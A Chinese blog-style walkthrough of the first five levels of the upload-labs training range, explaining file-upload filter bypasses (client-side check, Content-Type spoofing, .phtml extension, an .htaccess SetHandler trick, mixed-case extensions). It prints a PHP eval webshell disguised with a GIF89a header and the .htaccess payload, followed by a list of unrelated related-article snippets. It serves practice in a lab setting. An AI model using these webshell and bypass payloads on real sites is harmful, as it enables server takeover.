当前位置: 首页 > news >正文

upload靶场1-5关

网上的解析有一些题目对应不上,比如第五关说是 空格 点 空格绕过 ,我这里就无法成功解析,但大小写绕过就成功了,慢慢会把后面的关卡也写出来

这里建议开一台win7的虚拟机,在上面搭建靶场,可以省很多麻烦

Pass-01 绕过前端

如何判断是前端验证还是后端验证,上传一个文件,随便哪一个,如果可以抓到数据包,就证明是后端,反之则前端,因为数据与后端交互

这里上传图片马(正常一句话木马修改后缀为jpg或者png),抓包并且修改filename为php结尾

Pass-02 类型验证

怎么判断类型验证,把Content-Type整个删掉,无法上传就是类型验证

这里上传一个php文件,抓包修改Content-Type为 image/png 

Pass-03 后缀绕过

首先去修改一下配置文件  其他选项菜单-打开配置文件-httpd-conf

CTRL+F搜索关键字AddType,AddType application/x-httpd-php .php .php3 .phtml 删除前面的#

黑名单不允许上传PHP文件,但不是很全,修改Apache的配置文件使可以把特殊某些后缀当作PHP文件解析

上传PHP文件,修改filename为.phtml

Pass-04 .htaccess文件

是Apache的配置文件,其作用是控制当前目录,影响较小

#新建一个.htaccess文件,内容填写,意思是把所有文件当作php去处理
Sethandler application/x-httpd-php
#新建一个.png的文件,内容填写一句话木马
GIF89a
<?php @eval($_POST['a']);?>

依次上传,不用抓包就成功执行了

Pass-05 大小写绕过

转换了大小写,过滤了很多后缀,但漏掉了PHp这个后缀

懒得拿蚁剑连了,就写的phpinfo上传

<?php @phpinfo(); ?>

封面的图片用了作者博客的一张图片

相关文章:

upload靶场1-5关

网上的解析有一些题目对应不上&#xff0c;比如第五关说是 空格 点 空格绕过 &#xff0c;我这里就无法成功解析&#xff0c;但大小写绕过就成功了&#xff0c;慢慢会把后面的关卡也写出来 这里建议开一台win7的虚拟机&#xff0c;在上面搭建靶场&#xff0c;可以省很多麻烦 …...

网络传输(ping命令,wget命令,curl命令),端口

网络传输&#xff1a; ping命令&#xff1a;检查指定的网络服务器是否是可联通状态 语法&#xff1a;ping 【-c num】IP或主机名 -c&#xff1a;是检查的次数&#xff0c;不使用-c&#xff0c;将无限次持续检查 wget命令&#xff1a;wget是非交互式的文件下载器&#xff0…...

upload-labs靶场通关详解:第10关

一、分析源代码 $is_upload false; $msg null; if (isset($_POST[submit])) {if (file_exists(UPLOAD_PATH)) {$deny_ext array(".php",".php5",".php4",".php3",".php2",".html",".htm",".ph…...

深入解析`lsof`命令:查看系统中打开文件与进程信息

1、lsof的基本概念 lsof &#xff08;List Open Files&#xff09; 提供了一种方式来查看系统上哪些进程正在访问哪些文件&#xff0c;能够显示文件类型、文件名、文件描述符、所属进程等详细信息。 在类Unix系统中&#xff0c;几乎所有的操作都与文件相关联&#xff0c;文件不…...

C++ 与 Python 内存分配策略对比

内存管理是编程中的一个核心概念&#xff0c;它直接影响程序的性能、稳定性和资源利用率。C 和 Python 作为两种广泛使用的编程语言&#xff0c;在内存分配和管理方面采用了截然不同的策略。 C 内存分配策略 C 赋予程序员对内存的精细控制能力&#xff0c;同时也带来了更大的…...

TB开拓者策略交易信号闪烁根因及解决方法

TB开拓者策略信号闪烁分析 TB开拓者策略交易信号闪烁根因 TB开拓者策略交易信号闪烁根因分析 信号闪烁是交易策略开发中常见的问题&#xff0c;特别是在TB(TradeBlazer)开拓者等平台上。以下是信号闪烁的主要根因分析&#xff1a; 主要根因 未来函数问题 使用了包含未来信息…...

日语学习-日语知识点小记-构建基础-JLPT-N4阶段(24):受身形

日语学习-日语知识点小记-构建基础-JLPT-N4阶段(24):受身形 1、前言(1)情况说明(2)工程师的信仰2、知识点(1)うけみけい 受身形(2)復習(ふくしゅう):3、单词(1)日语(2)日语片假名单词4、相近词练习5、单词辨析记录6、总结1、前言 (1)情况说明 自己在今…...

牛客网NC209794:使徒袭来

牛客网NC209794:使徒袭来 题目背景 问题分析 数学建模 设三位驾驶员的战斗力分别为 a, b, c已知条件&#xff1a;a b c n (n为输入的正整数)目标&#xff1a;求 a b c 的最小值 解题思路 根据算术-几何平均值不等式(AM-GM不等式)&#xff0c;对于任意正实数a, b, c&a…...

命令行登录 MySQL 报 Segmentation fault 故障解决

问题描述&#xff1a;对 mysql8.0.35 源码进行 make&#xff0c;由于一开始因为yum源问题少安装依赖库 库&#xff0c;在链接时遇到错误 undefined reference to&#xff0c;后来安装了相关依赖库&#xff0c;再次 make 成功。于是将 mysqld 启动&#xff0c;再用 mysql -u roo…...

2025ICPC邀请赛南昌游记

滚榜时候队伍照片放的人家的闹麻了&#xff0c;手机举了半天 。 最后银牌700小几十罚时&#xff0c;rank60多点。 参赛体验还行&#xff0c;队长是福建人&#xff0c;说感觉这个热度是主场作战哈哈哈哈。空调制冷确实不太行吧。 9s过A是啥&#xff0c;没见过&#xff0c;虽然…...

kotlin flow的写法

以下是 Android 开发中 Kotlin Flow 的常见使用模式和操作符的完整中文总结&#xff1a; 1. 基本 Flow 创建方式 // 从多个值创建 val flow1 flowOf(1, 2, 3)// 使用 flow 构建器 val flow2 flow {emit(1)delay(100)emit(2) }// 从集合创建 val flow3 listOf(1, 2, 3).asFl…...

springboot+mybatis或mybatisplus在进行%name%的前后模糊查询时如何放防止sql注入

在使用 Spring Boot 配合 MyBatis 或 MyBatis-Plus 进行数据库操作时&#xff0c;确保防止 SQL 注入是非常重要的。对于 %name% 样式的前后模糊查询&#xff0c;以下是几种有效的方法来防止 SQL 注入&#xff1a; 1. 使用 MyBatis 的 <if> 标签和 #{} 占位符 MyBatis 默…...

基于51单片机教室红外计数灯光控制—可蓝牙控制

基于51单片机智能教室灯光 &#xff08;仿真&#xff0b;程序&#xff0b;原理图&#xff0b;PCB&#xff0b;设计报告&#xff09; 功能介绍 具体功能&#xff1a; 本系统由STC89C52单片机时钟芯片DS1302液晶屏LCD1602光敏电阻红外对管LED灯模块按键模块蓝牙模块构成 具体…...

HTTPS、SSL证书是啥?网站“安全小锁”的入门科普

你有没有发现&#xff0c;浏览网页时&#xff0c;有些网站地址栏前面会出现一个小锁的图标&#x1f512;&#xff0c;而有些网站却没有&#xff1f;这个小锁其实代表着网站用了“HTTPS”&#xff0c;是比普通“HTTP”更安全的协议。今天&#xff0c;我们就来聊聊HTTPS、SSL证书…...

大模型备案中的安全考量:筑牢数字时代的安全防线

在数字化浪潮席卷全球的当下&#xff0c;大模型技术凭借强大的数据分析、模式识别与语言理解生成能力&#xff0c;成为推动产业变革、提升社会运转效率的关键力量。从智能客服降本增效&#xff0c;到医疗影像精准诊断&#xff0c;再到金融风险智能预测&#xff0c;大模型正重塑…...

Linux句柄数过多问题排查

以下是Linux句柄数过多问题的排查与解决方法整理&#xff1a; 一、检测句柄使用情况 1‌.查看系统限制‌ 单个进程限制&#xff1a;ulimit -n 系统级总限制&#xff1a;cat /proc/sys/fs/file-max 2‌.统计进程占用量‌ 查看指定进程&#xff1a;lsof -p <PID> | wc -…...

Python训练第三十天

DAY 30 模块和库的导入 知识点回顾&#xff1a; 导入官方库的三种手段导入自定义库/模块的方式导入库/模块的核心逻辑&#xff1a;找到根目录&#xff08;python解释器的目录和终端的目录不一致&#xff09; 总结&#xff1a;导入包的核心就是找到目录&#xff0c;只有理解了py…...

Java资源管理与防止泄漏:从SeaTunnel源码看资源释放

资源管理是 Java 开发中常被忽视却至关重要的一环。本文从 SeaTunnel 案例出发&#xff0c;探讨 Java 中如何正确管理资源&#xff0c;防止资源泄漏。 SeaTunnel 中的一次修复 Apache SeaTunnel 项目中的 HiveSink 组件曾存在一个典型的资源泄漏隐患。修复前后的代码对比如下…...

Notepad++ 学习(三)使用python插件编写脚本:实现跳转指定标签页(自主研发)

目录 一、先看成果二、安装Python Script插件三、配置Python脚本四、使用脚本跳转标签页方法一&#xff1a;通过菜单运行方法二&#xff1a;设置快捷键&#xff08;推荐&#xff09; 五、注意事项六、进阶使用 官网地址&#xff1a; https://notepad-plus-plus.org/Python Scri…...

PYTHON训练营DAY30

库的导入 一、导入整个 import 库 二、从库中导入特征项 from 库 import XXX 三、非标准导入&#xff1a;导入整个库 from 库 import * 四、导入自定义的库 &#xff08;一&#xff09;项目 创建一个打招呼的库 # greet.py def say_hello(name):return f"你好&a…...

Linux 文件(2)

文章目录 1. 文件描述符1.1 文件描述符是什么1.2 文件描述符如何分配 2 重定向2.1 输出重定向2.2 输入重定向2.3 使用dup2进行重定向 3. 文件、父子进程和进程替换 1. 文件描述符 1.1 文件描述符是什么 什么是文件描述符呢&#xff1f; 我们先来看之前所介绍的系统级别的文件…...

netcore项目使用winforms与blazor结合来开发如何按F12,可以调出chrome devtool工具辅助开发

就是像在开发网页那样&#xff0c;可以使用devtool工具辅助开发。可查看页面css&#xff0c;js等。我在网上看解决办法。没一个有用的。自己找了一个。不需要单独在页面写多余的代码 我的program.cs中有服务注册代码增加 3行代码。 #if DEBUGservices.AddBlazorWebViewDevelo…...

CSS attr() 函数详解

attr() 是 CSS 中的一个函数&#xff0c;用于获取 HTML 元素的属性值并在样式中使用。虽然功能强大&#xff0c;但它的应用有一些限制和注意事项。 基本语法 element::pseudo-element {property: attr(attribute-name); } 可用场景 1. 在伪元素的 content 属性中使用&#…...

人生如戏、戏如人生

今早&#xff0c;6&#xff1a;30起床给一家人弄早餐&#xff0c;然后听到了老公的一声大喊&#xff1a;”半小时了&#xff0c;你干什么了“&#xff0c;原来孩子说她在理书包&#xff0c;被老公骂了。 最近几天&#xff0c;老公脾气变得很差&#xff0c;孩子每天都会被老公骂…...

Java迭代器知识点详解

在 Java 编程中&#xff0c;迭代器&#xff08;Iterator&#xff09;是一种用于遍历集合&#xff08;如 List、Set、Map 等&#xff09;元素的接口。它提供了一种统一的方式来访问集合中的元素&#xff0c;而无需暴露集合的内部结构。以下是关于 Java 迭代器的详细知识点&#…...

免费开放试乘体验!苏州金龙自动驾驶巴士即将上线阳澄数谷

近日&#xff0c;苏州自动驾驶巴士线路——阳澄数谷示范线正式上线&#xff0c;即日起向全民免费开放试乘体验&#xff01; 在苏州工业园区地铁3号线倪浜•阳澄数谷站外&#xff0c;一辆辆黑、白配色的小巴正在道路上有条不紊地行驶。与普通公交不同的是&#xff0c;小巴造型奇…...

Kotlin 协程

第一个协程程序 协程是可暂停计算的一个实例。它在概念上类似于线程&#xff0c;因为它需要运行一个代码块&#xff0c;该代码块与其他代码并发运行。然而&#xff0c;协程并不绑定到任何特定的线程。它可以在一个线程中暂停执行&#xff0c;并在另一个线程中恢复执行。 协程…...

MySQL函数触发:函数处理与触发器自动化应用

引言 各位数据库爱好者们好&#xff01;今天我们要探索MySQL中两个强大的自动化工具——函数和触发器 &#x1f680;。函数就像数据库中的"瑞士军刀"&#xff0c;能帮你高效处理各种数据&#xff1b;而触发器则是数据库的"自动感应器"&#xff0c;能在数据…...

数据可视化热图工具:Python实现CSV/XLS导入与EXE打包

在数据分析工作中,热图(Heatmap)是一种非常直观的可视化工具,能够清晰展示数据矩阵中的数值分布和相关性。本文将介绍如何使用Python构建一个支持CSV/XLS文件导入、热图生成并可打包为EXE的桌面应用程序。 核心功能设计 我们的热图工具将包含以下核心功能: 支持CSV和Excel…...

CUDA Stream的进阶用法:流水线并行的资源竞争解决方案

点击 “AladdinEdu&#xff0c;同学们用得起的【H卡】算力平台”&#xff0c;H卡级别算力&#xff0c;按量计费&#xff0c;灵活弹性&#xff0c;顶级配置&#xff0c;学生专属优惠。 引言&#xff1a;多任务推理场景的挑战 GPU在AI推理服务器的典型负载特征&#xff08;并行模…...

Eclipse Java 开发调优:如何让 Eclipse 运行更快?

Eclipse Java 开发调优&#xff1a;如何让 Eclipse 运行更快&#xff1f; 在 Java 开发领域&#xff0c;Eclipse 是一款被广泛使用的集成开发环境&#xff08;IDE&#xff09;。然而&#xff0c;随着项目的日益庞大和复杂&#xff0c;Eclipse 的运行速度可能会逐渐变慢&#x…...

大模型(1)——基本概念

文章目录 一、大模型的定义与概念二、大模型的原理与技术核心三、大模型的应用领域四、市面上常用的大模型1. 生成类模型&#xff08;文本/代码/图像&#xff09;2. 理解类模型&#xff08;文本/语义&#xff09;3. 多模态模型4. 国产大模型 五、总结与趋势 一、大模型的定义与…...

MYSQL故障排查和环境优化

一、MySQL故障排查 1. 单实例常见故障 &#xff08;1&#xff09;连接失败类问题 ERROR 2002 (HY000): Cant connect to MySQL server 原因&#xff1a;MySQL未启动或端口被防火墙拦截。 解决&#xff1a;启动MySQL服务&#xff08;systemctl start mysqld&#xff09;或开放…...

sts下载安装

windows下STS&#xff08;Spring Tools Suite&#xff0c;自带spring插件的eclipse&#xff09;的下载与安装_sts下载-CSDN博客Spring Boot安装与配置教程_spring boot安装配置-CSDN博客...

Baklib知识中台架构设计与智能服务实践

知识中台架构四库体系解析 现代企业知识管理系统的核心在于构建结构化知识资产池&#xff0c;Baklib通过独创的四库体系——知识库、流程库、案例库、模型库——实现知识资源的全生命周期管理。其中&#xff0c;知识库作为基础层&#xff0c;聚合文档、图谱等显性知识&#xf…...

TinyEngine 2.5版本正式发布:多选交互优化升级,页面预览支持热更新,性能持续跃升!

前言 TinyEngine低代码引擎使开发者能够定制低代码平台。它是低代码平台的底座&#xff0c;提供可视化搭建页面等基础能力&#xff0c;既可以通过线上搭配组合&#xff0c;也可以通过cli创建个人工程进行二次开发&#xff0c;实时定制出自己的低代码平台。适用于多场景的低代码…...

嵌入式系统:技术演进、应用领域发展趋势全面解析

嵌入式系统&#xff1a;技术演进、应用领域及发展趋势全面解析 一、引言 在当今数字化时代&#xff0c;嵌入式系统已悄然融入到我们生活的方方面面&#xff0c;从日常使用的智能手机、智能家电&#xff0c;到汽车中的各种控制系统&#xff0c;乃至工业生产中的自动化设备、航…...

软件工程-项目管理

进度管理 又叫时间管理&#xff0c;确定进度目标&#xff0c;在与质量、成本目标协调的基础上&#xff0c;实现工期目标 具体包括以下过程&#xff1a; 活动定义&#xff1a;确定完成各项交付成果需要展开的具体活动活动排序&#xff1a;活动之间的先后关系和逻辑关系活动资…...

计算机图形学编程(使用OpenGL和C++)(第2版)学习笔记 13.几何着色器(二)爆炸效果修改图元类型

1. 爆炸效果 这是几何着色器中的一个常见应用&#xff0c;我们使用几何着色器来模拟爆炸效果。 我们希望将每个三角形沿其表面法向量向外移动&#xff0c;则实际上是将组成环面的三角形向外“爆炸”。 我们只需取三个顶点的法向量&#xff0c;然后将其相加并求平均&#xff…...

需求频繁变更?AI 驱动的自动化解决方案实践

在软件开发的实际场景中&#xff0c;需求频繁变更已成为困扰开发团队的常见难题。每一次需求变动&#xff0c;都意味着代码的重新编写、调试与测试&#xff0c;不仅消耗大量时间和人力成本&#xff0c;还可能引发一系列连锁反应&#xff0c;影响项目进度与质量。而飞算 JavaAI …...

ffmpeg转码后的视频有横条纹和彩虹横条等乱彩问题

原因&#xff1a;ffmpeg安装的时&#xff0c;./configure 添加了–disable-asm参数&#xff0c;导致色彩异常。 **解决方法&#xff1a;**移除该参数–disable-asm。 注意&#xff1a;不加该参数可能提示no yasm或nasm等问题&#xff0c;解决该问题即可。大多是环境变量没有配置…...

QT6 源(111):阅读与注释菜单栏 QMenuBar,进行属性与成员函数测试,信号与槽函数测试,并给出源码

&#xff08;1&#xff09; &#xff08;2&#xff09; &#xff08;3&#xff09; &#xff08;4&#xff09; &#xff08;5&#xff09; &#xff08;6&#xff09; &#xff08;7&#xff09;以下源代码来自于头文件 qmenubar . h &#xff1a; #ifndef QMENUBAR_H #defi…...

达梦数据库对json字段进行操作

在达梦数据库中&#xff0c;字段类型不能显式定义为JSON&#xff0c;通常以VARCHAR或TEXT类型存储JSON字符串&#xff0c;可以通过内置的JSON函数对JSON格式数据进行操作和条件过滤。 1. 创建表并插入JSON数据 假设字段类型为VARCHAR&#xff0c;存储JSON字符串&#xff1a; -…...

基于vue框架的东莞市二手相机交易管理系统5yz0u(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。

系统程序文件列表 项目功能&#xff1a;用户,相机分类,二手相机 开题报告内容 基于FlaskVue框架的东莞市二手相机交易管理系统开题报告 一、研究背景与意义 1.1 研究背景 随着数字技术的迅猛发展和摄影文化的广泛普及&#xff0c;相机已成为人们记录生活、表达创意的重要工…...

谷歌 NotebookLM 即将推出 Sparks 视频概览:Gemini 与 Deep Research 加持,可生成 1 - 3 分钟 AI 视频

近期&#xff0c;谷歌旗下的 NotebookLM 即将推出一项令人瞩目的新功能 ——Sparks 视频概览。这一功能借助 Gemini 与 Deep Research 的强大能力&#xff0c;能够生成 1 - 3 分钟的 AI 视频&#xff0c;为用户带来全新的内容创作与信息获取体验。 NotebookLM&#xff1a;AI 笔…...

MCP详解

前言:AI能力跃迁的“最后一公里” 当前,大语言模型(LLMs)已展现出文本生成、逻辑推理等通用能力,但其与真实世界的交互仍存在瓶颈。传统模式下,开发者需为每个外部工具(如数据库、API、文件系统)编写定制化接口,导致开发周期长、兼容性差、安全风险高。而​​模型上下…...

信息学奥赛一本通 1539:简单题 | 洛谷 P5057 [CQOI2006] 简单题

【题目链接】 ybt 1539&#xff1a;简单题 洛谷 P5057 [CQOI2006] 简单题 【题目考点】 1. 树状数组 模板题及讲解&#xff1a;洛谷 P3374 【模板】树状数组 【解题思路】 解法1&#xff1a;树状数组 该有01构成数组初值都为0。 某位置的元素被修改奇数次后值为1&#x…...

设计模式-面试题

摘要&#xff1a; 1、通俗易懂&#xff0c;适合小白 2、仅做面试复习用&#xff0c;部分来源网络&#xff0c;博文免费&#xff0c;知识无价&#xff0c;侵权请联系&#xff01; 1. 什么是设计模式&#xff1f; 设计模式是在软件开发过程中&#xff0c;针对反复出现的问题所…...

upload-labs靶场通关详解:第11关

一、分析源代码 $is_upload false; $msg null; if (isset($_POST[submit])) {if (file_exists(UPLOAD_PATH)) {$deny_ext array("php","php5","php4","php3","php2","html","htm","phtml"…...

excel:时间戳格式与日期格式的互转

13位时间戳转日期时间&#xff08;毫秒&#xff09; 假设A2单元格内容为13位的时间戳&#xff0c;再选中B2单元格&#xff0c;在公式框中输入 TEXT((A2/10008*3600)/8640070*36519,"yyyy/mm/dd hh:mm:ss.000")接下来&#xff0c;选中B2单元格&#xff0c;下拉应用公…...